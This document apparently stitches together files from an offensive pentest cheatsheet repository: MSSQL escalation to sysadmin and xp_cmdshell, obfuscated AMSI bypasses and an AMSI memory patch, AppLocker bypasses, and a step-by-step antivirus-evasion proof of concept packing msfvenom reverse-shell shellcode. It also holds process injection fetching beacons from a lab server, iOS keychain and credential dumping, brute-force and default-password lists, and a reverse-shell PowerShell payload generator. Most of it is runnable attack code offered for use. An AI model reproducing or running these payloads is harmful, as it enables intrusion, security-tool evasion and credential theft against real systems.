Invoke-SQLEscalatePriv -Verbose -Instance "SQLServer1\Instance1"

Invoke-SQLAudit -Verbose -Instance

SELECT IS_SRVROLEMEMBER ('sysadmin') , IS_MEMBER ('db_owner'), USER_NAME()
exec master.dbo.xp_dirtree '\\\\xpdirtree_exploit'
SELECT IS_SRVROLEMEMBER ('sysadmin') , IS_MEMBER ('db_owner'), USER_NAME()

EXECUTE AS USER='dbo'
ALTER SERVER ROLE [sysadmin]
ADD MEMBER []
-- RECONFIGURE is required after each sp_configure change
EXEC sp_configure 'show advanced options',1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'

# Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN WITH PASSWORD = '''''''' '') AT "\"') AT "\"
EXECUTE('EXECUTE(''sp_addsrvrolemember '''''''' , ''''sysadmin'''' '') AT "\"') AT "\"

# Remediation
REVOKE Execute ON xp_dirtree FROM PUBLIC 443 | ``` 444 | 445 | 446 | -------------------------------------------------------------------------------- /Cheatsheets/internal/09-antivirus-bypass.md: -------------------------------------------------------------------------------- 1 | # AV Bypass 2 | 3 | ## Practical 4 | 5 | ### C2 6 | 7 | - [Covenant](https://github.com/cobbr/Covenant) 8 | - [Cobalt Strike](https://www.cobaltstrike.com/) 9 | - Metasploit (Without meterpreter ^^) 10 | 11 | ### Packer 12 | - [PEzor](https://github.com/phra/PEzor) 13 | - [ScareCrow](https://github.com/optiv/ScareCrow) 14 | 15 | ### Memory injection 16 | - [SharpBlock](https://github.com/CCob/SharpBlock) 17 | - inject shellcode directly into memory 18 | - bypass ETW and Process Hollowing detection 19 | - Bypass specific AV and ERD dll 20 | 21 | ### Not distributed to online AV 22 | - [antiscan.me](https://antiscan.me) 23 | - [nodistribute](https://nodistribute.com/) 24 | 25 | ### AMSI Bypass 26 | 27 | one line 28 | 29 | ```sh 30 | sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) 31 | 32 | set-item('V'+'aR'+'IA'+'blE:1q2'+'uZx')([TYpE]("{1}{0}"-F'F','rE'));(GeT-VariaBle("1Q2U"+"zX")-VaL)."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}"-f'Util','A','Amsi','.Management.','utomation.','s','System'))."g`etf`iElD"(("{0}{2}{1}"-f'amsi','d','InitFaile'),("{2}{4}{0}{1}{3}"-f'Stat','i','NonPubli','c','c,'))."sE`T`VaLUE"(${n`ULl},${t`RuE}) 33 | 34 | $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") 
{$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) 35 | ``` 36 | 37 | script (can be copied pasted directly into powershell console) 38 | 39 | ```bash 40 | function LookupFunc { 41 | Param ($moduleName, $functionName) 42 | 43 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 44 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 45 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 46 | $tmp=@() 47 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 48 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) 49 | } 50 | 51 | function getDelegateType { 52 | Param ( 53 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, [Parameter(Position = 1)] [Type] $delType = [Void] 54 | ) 55 | $type = [AppDomain]::CurrentDomain. 56 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 57 | DefineDynamicModule('InMemoryModule', $false). 58 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) 59 | $type. 60 | DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func). 61 | SetImplementationFlags('Runtime, Managed') 62 | $type. 63 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). 
64 | SetImplementationFlags('Runtime, Managed') 65 | 66 | return $type.CreateType() 67 | } 68 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession 69 | $oldProtectionBuffer = 0 70 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool]))) 71 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer) 72 | 73 | $buf = [Byte[]] (0x48, 0x31, 0xC0) 74 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3) 75 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer) 76 | ``` 77 | 78 | ### Applocker whitelist bypass 79 | 80 | - LOLBAS 81 | - Copy binary to trusted folders 82 | - dll acceschk c:/windows 83 | 84 | ```bash 85 | type js.js > "C:\.log:js.js" 86 | dir /r ".log 87 | wscript "C:\.log:js.js" 88 | ``` 89 | 90 | - Alternate Data Stream 91 | 92 | ```bash 93 | type js.js > "C:\.log:js.js" 94 | dir /r ".log 95 | wscript "C:\.log:js.js" 96 | ``` 97 | 98 | - Third part execution 99 | 100 | Using Python, Perl, etc. 101 | 102 | 103 | ### Full PoC against Kasp 104 | 105 | Winning combo : SharpBlock + PEzor (bypass Kasp for the moment..) 106 | 107 | 1. Compile SharpBlock from source (using VStudio). It generates a file : SharpBlock.exe 108 | 2. Generate shellcode in raw format (here is an exemple for msf) : 109 | 110 | ```sh 111 | msfvenom -p windows/x64/shell_reverse_tcp LHOST= LHOST= -f raw -o .bin 112 | ``` 113 | 3. Repack shellcode 114 | ```sh 115 | ./PEzor.sh -unhook -rx -sleep=150 .bin 116 | ``` 117 | 4. Repack SharpBlock adding arguments 118 | - HTTP webserver version : 119 | ```sh 120 | ./PEzor.sh -unhook -antidebug -text -rx -sleep=150 -p '-e http:///.bin.packed.exe -s "C:\Windows\System32\SecurityHealthSystray.exe"' 121 | ``` 122 | 123 | 5. Setup your launcher (and webserver), and execute the packed binary file from the target 124 | 125 | 6. 
Be patient (around 5min depending on the sleep argument set), get your shell and enjoy :) 126 | 127 | --- 128 | 129 | ### Offline testing 130 | 131 | For testing using a Windows VM connecting to an offline C2 : 132 | 1. Create a Windows VM and install the target AV. 133 | 2. Create a Linux VM and install a C2. 134 | 3. Set up the network interface to Host-Only for all VMs (Target(s) and C2). 135 | 4. Test your payloads and enjoy your shells :) 136 | > You may want to use snapshots and/or linked clones after your infrastructure is ready so that you can trash your Windows VM after each test and pop a new one. 137 | 138 | --- 139 | 140 | ### Online testing 141 | 142 | For testing using a Windows VM connecting to an online C2 : 143 | 144 | #### Context 145 | 146 | - Restrict Windows VM network 147 | - No trust in the Windows VM firewall 148 | - No need to alter the host firewall 149 | 150 | To restrict the Windows VM traffic to the C2 server only (we don't want our payloads to get sent to the AV cloud), we will create a new Linux VM and use is as a router/firewall. 151 | 152 | #### Setup 153 | 154 | 1. Create a Windows VM and install the target AV. 155 | 2. Set up the network interface to Host-Only. 156 | 3. Create a Linux VM with 2 network interfaces (NAT and Host-only). 157 | 4. Enable ip forwarding : `echo "net.ipv4.forwarding=1">>/etc/sysctl.conf` 158 | 5. Setup the firewall as following : 159 | ``` 160 | #!/bin/bash 161 | WANIF=enp0s3 162 | LANIF=enp0s8 163 | # IPs to allow 164 | IP_ALLOWED= 165 | echo "flushing iptables..." 
166 | sudo iptables -F 167 | sudo iptables -X 168 | sudo iptables -t nat -F 169 | sudo iptables -t nat -X 170 | sudo iptables -t mangle -F 171 | sudo iptables -t mangle -X 172 | # allow ssh on vm 173 | sudo iptables -A INPUT -i $LANIF -p tcp --dport 22 -j ACCEPT 174 | # masquerade 175 | sudo iptables -A POSTROUTING -t nat -o $WANIF -j MASQUERADE 176 | sudo iptables -A FORWARD -i $WANIF -m state --state ESTABLISHED,RELATED -j ACCEPT 177 | # Allow ping on target 178 | sudo iptables -A FORWARD -i $LANIF -p icmp -d $IP_ALLOWED -j ACCEPT 179 | # Allow on target 180 | sudo iptables -A FORWARD -i $LANIF -p tcp --dport -d $IP_ALLOWED -j ACCEPT 181 | # Drop the rest 182 | sudo iptables -P INPUT DROP 183 | sudo iptables -P FORWARD DROP 184 | sudo iptables -P OUTPUT DROP 185 | ``` 186 | 6. make it persistent at each restart : 187 | ```sh 188 | sudo apt install iptables-persistent && sudo iptables-save -c > /etc/iptables/rules.v4 189 | ``` 190 | 7. Configure the Windows VM (Host-Only network interface) to use the linux VM as his gateway (set static IP address). 191 | 8. For DNS you can add the association into the file : `C:\Windows\System32\drivers\etc\hosts` 192 | 9. Test your payloads and enjoy your shells ! 193 | 194 | --- 195 | 196 | ### Automated testing 197 | 198 | CI Pipeline 199 | 200 | **todo** 201 | 202 | --- 203 | 204 | ### VisualStudio compiler 205 | 206 | Compiler location 207 | 208 | ```bat 209 | C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.28.29333\bin\Hostx64\x64\Src 210 | ``` 211 | 212 | --- 213 | 214 | ### Fix Pezor 215 | 216 | Fixed by author. 
check : [Inline syscall old version](https://github.com/phra/PEzor/commit/531095695f56b7ab3add7c9c154ebce830e534a7) 217 | 218 | 219 | --- 220 | 221 | ### Vrac commands 222 | 223 | ```sh 224 | for i in `cat /tmp/default_users_for_services_unhash.txt` ; do /opt/vpn_connect -u $i -p a -l /tmp/$i;done 225 | 226 | copy \\192.168.56.200\tiki\processinjectionn.zip C:\Users\wee\ 227 | copy C:\Users\wee\processinjectionn\ProcessInjection\ProcessInjection\bin\Debug\ProcessInjection.exe \\192.168.56.200\tiki\ 228 | 229 | ProcessInjection.exe.packed.exe /f:raw /url:http://192.168.56.200:9000/procinj /ppath:C:\program files\internet explorer\iexplore.exe /pid:7368 /t:4 230 | ProcessInjection.exe /f:raw /url:http://192.168.56.200:9000/procinj /ppath:C:\program files\internet explorer\iexplore.exe /pid:7368 /t:4 231 | ProcessInjection.exe /f:raw /url:http://192.168.56.200:9000/procinj /ppath:"C:\program files\internet explorer\iexplore.exe" /pid:4928 /t:3 232 | ProcessInjection.exe /f:raw /url:http://192.168.56.200:9000/longhaul/longhaul_beacon/beacon64.bin.sgn /ppath:"C:\program files\internet explorer\iexplore.exe" /t:3 233 | 234 | cd "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.28.29333\bin\Hostx64\x64>" 235 | copy Bin\wraith_x64_encoded.bin \\192.168.56.200\tiki\ 236 | 237 | ``` 238 | 239 | ### LOLBIN 240 | 241 | #### tpmtool 242 | `tpmtool.exe drivertracing stop` it will run cmd.exe who call logman.exe in the current folder 243 | 244 | #### IE 245 | 246 | By navigating to URI: `shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}` you can spawn `rstrui.exe` (System Restore). 247 | If you modify the `SystemRoot` environment variable and copy over DLLs you can run whatever you like. 
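The two LOLBIN behaviours above are easy to turn into process-creation rules. The Python below is an added detection-side example, not part of this cheatsheet or of any tool it lists; the event schema, the field names and the sample events are constructed assumptions (real telemetry would carry process GUIDs rather than reusable PIDs, and the exact command line tpmtool hands to cmd.exe is not recorded here). It flags a `logman.exe` that resolves outside System32 underneath `tpmtool.exe`, and an `rstrui.exe` whose parent is `iexplore.exe`.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (constructed schema, not a real product's)."""
    pid: int
    ppid: int
    image: str      # full path of the new process's executable
    cmdline: str


# Where the genuine Windows binaries live; a binary with one of their names loaded
# from anywhere else is a search-order / current-directory hijack candidate.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent], limit: int = 16) -> List[str]:
    """Image names of the parent, grandparent, ... (nearest first), bounded to avoid loops."""
    chain: List[str] = []
    cur = by_pid.get(ev.ppid)
    while cur is not None and len(chain) < limit:
        chain.append(image_name(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for every event matching one of the two LOLBIN rules."""
    by_pid = {e.pid: e for e in events}   # assumption: no PID reuse inside one batch
    alerts: List[Tuple[int, str]] = []
    for e in events:
        name = image_name(e.image)
        parents = ancestry(e, by_pid)
        # Rule 1: tpmtool drivertracing -> cmd.exe -> logman.exe picked up from the
        # current folder instead of System32.
        if name == "logman.exe" and not in_system_dir(e.image) and "tpmtool.exe" in parents:
            alerts.append((e.pid, "tpmtool-logman-hijack"))
        # Rule 2: the System Restore UI started by the browser through a shell: URI.
        if name == "rstrui.exe" and parents[:1] == ["iexplore.exe"]:
            alerts.append((e.pid, "iexplore-spawns-rstrui"))
    return alerts


# Constructed sample batch: an explorer session, the tpmtool chain, an IE-launched
# rstrui.exe, and two benign launches of the same binaries from System32.
SAMPLE_EVENTS = [
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\tpmtool.exe", "tpmtool.exe drivertracing stop"),
    ProcEvent(201, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c logman ..."),
    ProcEvent(202, 201, r"C:\Users\lab\Downloads\logman.exe", "logman ..."),
    ProcEvent(300, 100, r"C:\Program Files\Internet Explorer\iexplore.exe", "iexplore.exe"),
    ProcEvent(301, 300, r"C:\Windows\System32\rstrui.exe", "rstrui.exe"),
    ProcEvent(400, 100, r"C:\Windows\System32\logman.exe", "logman.exe query"),
    ProcEvent(500, 100, r"C:\Windows\System32\rstrui.exe", "rstrui.exe"),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} rule={rule}")
```

Only the two malicious launches (pids 202 and 301) fire; the legitimate `logman.exe` and `rstrui.exe` from System32 under explorer.exe stay quiet, which is the baseline these rules need to be usable on a real fleet.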
---

## Theoretical

Every file has a score that contributes to triggering one of three different states (which can change during the scanning process):

- good (allow)
- bad (block and alert)
- unknown (block, allow, monitor, and/or scary prompt, depending on the AV)

### Static analysis

#### 1. Rule-based

Content in the binary that matches an analyst's definition of known bad:

- obfuscate functions and strings from offensive code
- obfuscate base64-encoded DLLs or shellcode
- change the decryption key
- resolve GetProcAddress and GetModuleHandle dynamically

#### 2. Heuristics

Properties of the binary used to find suspicious things:

- compile time
- compiler (Windows => good, Linux => not good for WinDef)
- import table
- metadata resources (name, icon, absence of these)
- signed or not
- entropy
- take metadata from an existing program
- import table shellcode injection

#### 3. Correlation

- append a known good program to get a good score
- reduce entropy (don't pack everything)

---

### Dynamic analysis

#### 1. Local sandbox: emulated memory (~3 s)

- short time (3 s only)
- incomplete emulation (CPU only)

#### 2. Cloud VM (~1 min)

- checks metadata (sha256 or any IoC from a previous analysis)
- more complete emulation

---

### In-memory detection evasion

*payload exe => reflective dll => payload dll*

Thread start address (DLLs are memory-mapped files)

- Depends on the artifact or process injection routine that ran the payload

Memory permissions

- Avoid RWX permissions (RW => RX)
- Avoid stagers (use stageless payloads)
- Avoid module-less threads (CreateThread)
- module stamping (persistence)

Memory content

- signs of a PE file
- strings associated with the toolset or common techniques
- image_size, prepend, obfuscate, cleanup, strrep, sleep_mask (Cobalt)

Behaviour

- avoid writing a file to disk
- spoof the parent PID when executing a program
- injecting into a process (!)

Process contexts to avoid (parent, child):

- explorer.exe, notepad.exe, powershell.exe, rundll32.exe, svchost.exe
- commonly abused applications
- different architecture (x86 or x64)

Bypass sandbox detonation (VM)

1. detect the sandbox
2. environment keying

Whitelisted programs:

- MS Office macros
- PowerShell
- LOLBins
- DLL sideloading

---

## Links

[Network Sockets](https://artikrh.github.io/posts/av-evasion-network-sockets)

[Cobalt Strike: Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk)

[Wraith](https://github.com/slaeryan/AQUARMOURY/tree/master/Wraith)

--------------------------------------------------------------------------------
/Cheatsheets/internal/10-kerberos.md:
--------------------------------------------------------------------------------
# Kerberos

## 1. **How it works**

### Reminder

- The user authenticates to the Kerberos server (usually the DC)
- The DC sends a TGT that says "I certify that this is who he says he is".
- The user requests a TGS for the service he wants, using his TGT
- The service checks that he has the right to access; if yes, it sends him a TGS
- The user uses his TGS to access the service

> The TGT is signed with the NT hash of the krbtgt account

> The TGS is signed with the NT hash of the machine account

--------------------------------------------------------------------------------
/Cheatsheets/internal/11-wsus.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/michmich1000/Cheatsheets/6b4baa1255896e97624ad6f6d3a6a680cceb6dc1/Cheatsheets/internal/11-wsus.md
--------------------------------------------------------------------------------
/Cheatsheets/lab/01-windows.md:
--------------------------------------------------------------------------------
# Lab windows

## 1. **Installation**

### Download the ISO

Go to Microsoft, download the .iso and select Windows Pro (if you choose another edition you will not have RDP).

### Use a local account instead of a Microsoft account

Microsoft has hidden the offline installation button. To make it reappear and use a local account, do the following:

`Shift + F10` gives you a prompt; type `OOBE\BYPASSNRO`

Another way is to use the following email address: no@thankyou.com and type a random password.

### Create a local admin

```
net user pwn pwn /add
net localgroup administrators pwn /add
```

### Disable UAC

```
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
```

or go to `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` and set `EnableLUA` to 0

## 2. **Enable Windows**

Open PowerShell as admin and run `irm https://massgrave.dev/get | iex`

## 3. **Setup env for creating payloads**

### Setup env for C++

### Setup env for .NET

## 4. **Tools to help**

### **Debugger**

* [x32dbg](https://x64dbg.com/)
* [x64dbg](https://x64dbg.com/)

### **Analysis**

* [PE-bear](https://github.com/hasherezade/pe-bear)
* [pe-sieve64](https://github.com/hasherezade/pe-sieve)
* [Process Hacker 2](https://processhacker.sourceforge.io/downloads.php)
* [Process Explorer](https://learn.microsoft.com/fr-fr/sysinternals/downloads/process-explorer)
* [Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)

--------------------------------------------------------------------------------
/Cheatsheets/mobile/01-ios.md:
--------------------------------------------------------------------------------
# iOS Penetration Testing

## **Setup**

Download:

> https://mobexler.com

password: `12345`

> iPad root default password: `alpine`

## [Frida](https://github.com/frida)

Check if your device is connected: `ideviceinfo`

### List running apps

`frida-ps -Uai`

### Check App

`frida-trace -U -m "-[NSURL* *HTTP*]"`

## Objection

Run `frida-ps -Uai` then `objection -g explore`

`ios info binary`

`ls` then `ios plist cat Info.plist`

### Dump passwords from Safari

`ios nsurlcredentialstorage dump`

### Check for creds

`ios keychain dump`

### SSL pinning

`ios sslpinning disable`

### Search for recent searches

`ios nsuserdefaults get` and check `RecentWebSearches`

### Search for passwords

`fridump -s -U "My App"`

`strings *.data > strings.txt`

and now grep for "pass", "password", "secret", "credential", etc.

### Search for cookies

`ios cookies get`

### List modules in memory

`memory list modules`

`memory list exports `

### Hooking on a class

`ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController`

### Hooking on a method

`ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return`

### env

`env`

```
CachesDirectory /var/mobile/Containers/Data/Application/xxx/Library/Caches
DocumentDirectory /var/mobile/Containers/Data/Application/xxx/Documents
LibraryDirectory /var/mobile/Containers/Data/Application/xxx/Library
```

### Run JS from Frida

`frida -U -f com.xxx.yyy -l alert.js`

Alert script example

```js
var UIAlertController = ObjC.classes.UIAlertController;
var UIAlertAction = ObjC.classes.UIAlertAction;
var UIApplication = ObjC.classes.UIApplication;
var handler = new ObjC.Block({ retType: 'void', argTypes: ['object'], implementation: function () {} });

ObjC.schedule(ObjC.mainQueue, function () {
    var alert = UIAlertController.alertControllerWithTitle_message_preferredStyle_('Frida', 'pwned!', 1);
    var defaultAction = UIAlertAction.actionWithTitle_style_handler_('OK', 0, handler);
    alert.addAction_(defaultAction);
    UIApplication.sharedApplication().keyWindow().rootViewController().presentViewController_animated_completion_(alert, true, NULL);
})
```

With Python: `python3 hook.py alert.js`

```python
import sys

import frida

# Read the Frida script given on the command line and load it into the
# target app on the USB-attached device (attach() takes the app name or PID).
with open(sys.argv[1], 'r') as f:
    jscode = f.read()
process = frida.get_usb_device().attach('')
script = process.create_script(jscode)
print('[ * ] Running alert on target')
script.load()
sys.stdin.read()   # keep the script alive until stdin is closed
```

### Run static analysis using Frida

`frida --codeshare interference-security/ios-app-static-analysis -U ` (it will execute this code: https://codeshare.frida.re/@interference-security/ios-app-static-analysis/)

--------------------------------------------------------------------------------
/Cheatsheets/mobile/02-android.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/michmich1000/Cheatsheets/6b4baa1255896e97624ad6f6d3a6a680cceb6dc1/Cheatsheets/mobile/02-android.md
--------------------------------------------------------------------------------
/Cheatsheets/passwords/brute-force.md:
--------------------------------------------------------------------------------
# Brute-force

## Offline

```bash
# Brute force
john --format=NT hashNT.txt
hashcat -m 1000 -a 3 hashNT.txt

# Dictionary
john --format=NT hashNT.txt --wordlist=dictionary.txt --rules=korelogic
john --format=NT hashNT.txt --wordlist=dictionary.txt --rules=insidepro
hashcat -m 1000 -a 0 hashNT.txt dictionary.txt -r rules/best64.rule
```

## TCP 445 (SMB)

```bash
crackmapexec smb target.txt -u user1 user2 -p password
crackmapexec smb target.txt -u user -p password1 password2
crackmapexec smb target.txt -u user.txt -p password1
crackmapexec smb target.txt -u user -p password.txt

# 1 user = 1 password
crackmapexec smb -u user.txt -p password.txt --no-bruteforce --continue-on-success

# cluster bomb
crackmapexec smb target.txt -u user.txt -p password.txt --continue-on-success

nmap --script smb-brute -p 445
hydra -l -P pass.txt smb -t 1
```

## TCP 3389 (RDP)

```bash
ncrack -vv --user -P pass.txt rdp://
hydra -V -f -L user.txt -P pass.txt rdp://
```

---

## TCP 389/636 (LDAP(S))

```bash
python patator.py ldap_login host= binddn='CN=FILE0,dc=,dc=' bindpw=FILE1 0=user.txt 1=pass.txt

nmap --script ldap-brute -p 389
```

--------------------------------------------------------------------------------
/Cheatsheets/passwords/default-pass.md:
--------------------------------------------------------------------------------
# Default pass

## Saia

The PCD built-in FTP server is defined to be connected with only one user

```bash
root:rootpasswd
```

---

## Dahua

```bash
Username: admin     Password: admin
Username: admin     Password: 1234
Username: 888888    Password: 888888
Username: 666666    Password: 666666
Username: default   Password: default
```

---

## OpenScape Business Assistant

```bash
123456
administrator@system:administrator
```

--------------------------------------------------------------------------------
/Cheatsheets/passwords/hashs.md:
--------------------------------------------------------------------------------
# Hashes

## Theoretical

Hashes to use with CrackMapExec: `NTLM / NTLMv2 / LM`

Hashes to use with ntlmrelayx: `NET-NTLM / NET-NTLMv2`

> LM / NTLM(v2) can be used at any time. NET-NTLM(v2) are usable only for a limited period of time.

### NTLM

```bash
aad3b435b51404eeaad3b435b51404ee:87247c6499ddef87b7348f262a3e203d
aad3b435b51404eeaad3b435b51404ee:64247c6499def845dsffg652a3e2052f
```

> By default the LM half of a dumped hash is `aad3b435b51404eeaad3b435b51404ee` (the LM hash of an empty string); if it is anything else, a real LM hash is present.
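To make the note above mechanical, here is an added Python classifier (not part of the cheatsheet) that tells the layouts apart: a pwdump-style `LM:NT` pair, whose LM half is either the empty-string marker `aad3b435b51404eeaad3b435b51404ee` or a real LM hash, versus the Net-NTLMv1/v2 challenge/response lines that ntlmrelayx and hashcat (modes 5500/5600) consume. It also flags an NT half equal to the empty-password hash. All sample values are constructed; the two empty-string constants are the only real ones.

```python
import re
from dataclasses import dataclass

# LM and NT hashes of the empty string: well-known constants that show up in
# dumps whenever LM storage is disabled (the LM half) or an account has no
# password (the NT half).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

_HEX = re.compile(r"^[0-9a-fA-F]+$")


def _is_hex(s: str, length: int = 0) -> bool:
    """True if s is hex and (when length is given) exactly that many digits."""
    return bool(_HEX.match(s)) and (length == 0 or len(s) == length)


@dataclass(frozen=True)
class HashInfo:
    kind: str            # "LM:NT", "NetNTLMv1", "NetNTLMv2" or "unknown"
    real_lm: bool        # True when the LM half is not the empty-string marker
    empty_password: bool # True when the NT half is the empty-string NT hash
    note: str


def classify(entry: str) -> HashInfo:
    """Classify a credential string by layout alone; the cheatsheet's LM/NT vs
    Net-NTLM split decides what each kind can be used for."""
    parts = entry.strip().split(":")

    # pwdump-style "lm:nt" or "user:rid:lm:nt:::"
    lm = nt = None
    if len(parts) == 2:
        lm, nt = parts
    elif len(parts) >= 4 and parts[1].isdigit():
        lm, nt = parts[2], parts[3]
    if lm is not None and _is_hex(lm, 32) and _is_hex(nt, 32):
        real_lm = lm.lower() != EMPTY_LM
        note = ("LM hashing is still enabled on the source host" if real_lm
                else "LM half is the empty marker; only the NT half carries information")
        return HashInfo("LM:NT", real_lm, nt.lower() == EMPTY_NT, note)

    # Net-NTLM challenge/response as captured on the wire, "user::domain:a:b:c";
    # the widths of the three hex fields distinguish v1 from v2.
    if len(parts) == 6 and parts[1] == "":
        a, b, c = parts[3], parts[4], parts[5]
        if _is_hex(a, 48) and _is_hex(b, 48) and _is_hex(c, 16):
            return HashInfo("NetNTLMv1", False, False,
                            "challenge/response: relayable or crackable, not reusable as a hash")
        if _is_hex(a, 16) and _is_hex(b, 32) and _is_hex(c) and len(c) > 32:
            return HashInfo("NetNTLMv2", False, False,
                            "challenge/response: relayable or crackable, not reusable as a hash")

    return HashInfo("unknown", False, False,
                    "layout not recognised: check for non-hex characters or truncation")


# Constructed samples (only EMPTY_LM / EMPTY_NT are real values).
SAMPLES = [
    "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0",        # empty password
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:" + "0123456789abcdef" * 2 + ":::",
    "legacy:1001:" + "a1" * 16 + ":" + "b2" * 16 + ":::",                       # real LM half
    "user::CORP:1122334455667788:" + "c3" * 16 + ":0101000000000000" + "d4" * 20, # NetNTLMv2
    "user::HOST:" + "e5" * 24 + ":" + "f6" * 24 + ":1122334455667788",           # NetNTLMv1
    "12587c6654ddef87b67485sdfb2e203d:64247c6499def845dsffg652a3e2052f",        # not hex
]

if __name__ == "__main__":
    for s in SAMPLES:
        info = classify(s)
        print(f"{info.kind:10} real_lm={info.real_lm!s:5} empty_pw={info.empty_password!s:5} {info.note}")
```

The hex check is the part worth keeping: a pasted hash with a stray non-hex character (like the `g` in the second NTLM sample above) is rejected by the cracking tools with an unhelpful error, and this catches it up front.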
19 | 20 | ### LM 21 | 22 | ```bash 23 | 88647c6699d8ef87b6d48f262b2e2h3d:89244c64f9ddef87b7348f262a3e204d 24 | 12587c6654ddef87b67485sdfb2e203d:64247c6499def845dsffg652a3e2052f 25 | ``` 26 | 27 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/git.md: -------------------------------------------------------------------------------- 1 | # Git 2 | 3 | Push new commit 4 | 5 | ```bash 6 | git checkout -b 7 | git add . 8 | git commit -m "My commit message" 9 | git push origin 10 | 11 | git add . && git commit -m "My commit message" && git push origin master 12 | ``` 13 | 14 | >you also can run `git add -p` to check diff step by step 15 | 16 | 17 | Amend to last comit 18 | 19 | ```bash 20 | git add . && git commit --amend --no-edit && git push -f 21 | ``` 22 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/python.md: -------------------------------------------------------------------------------- 1 | # Python 2 | 3 | ### Manual install .whl 4 | ```python 5 | python3 -m pip install --user .whl 6 | ``` 7 | 8 | 9 | ### Powershell base64 encode 10 | 11 | ```python 12 | #!/usr/bin/env python3 13 | # 14 | # generate reverse powershell cmdline with base64 encoded args 15 | # 16 | 17 | import sys 18 | import base64 19 | 20 | def help(): 21 | print("USAGE: %s IP PORT" % sys.argv[0]) 22 | print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT") 23 | exit() 24 | 25 | try: 26 | (ip, port) = (sys.argv[1], int(sys.argv[2])) 27 | except: 28 | help() 29 | 30 | #payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> 
